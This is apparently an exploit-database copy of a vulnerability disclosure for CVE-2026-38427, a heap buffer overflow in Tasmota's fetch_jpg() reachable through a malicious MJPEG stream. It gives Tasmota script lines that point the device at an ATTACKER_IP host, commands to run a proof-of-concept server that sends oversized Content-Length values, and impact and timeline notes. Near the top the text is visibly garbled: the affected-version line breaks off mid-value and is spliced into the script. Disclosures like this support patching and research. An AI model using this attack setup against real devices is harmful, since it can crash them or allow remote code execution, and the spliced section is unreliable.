Share
## https://sploitus.com/exploit?id=F03A36CE-08F4-59DF-B4D9-99156AEA0C10
# CVE-2026-38427: Integer Wraparound โ†’ Heap Buffer Overflow in Tasmota fetch_jpg()

**CVE:** CVE-2026-38427  
**Severity:** Critical (CVSS 9.8)  
**Product:** Arendst Tasmota  
**Affected Version:** D
>B
fetchjp(ATTACKER_IP:PORT/stream,0,0,1)
>1
=fetchjp(2,0,0,1)
```

---

## Proof of Concept

The PoC runs a fake MJPEG HTTP server that sends frames with malicious `Content-Length` values:

```python
python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
python3 CVE-2026-38427_poc.py --port 8889 --cl 131072
```

See [CVE-2026-38427_poc.py](CVE-2026-38427_poc.py) for full implementation.

---

## Impact

- **Confidentiality:** High (RCE possible on ESP32)
- **Integrity:** High
- **Availability:** High (guaranteed crash/reboot)
- **Attack Vector:** Network
- **Authentication:** None required (device must be scripted to connect to attacker server)

---

## Timeline

- **2026-03-29:** Vulnerability discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38427 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)

---

## References

- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38427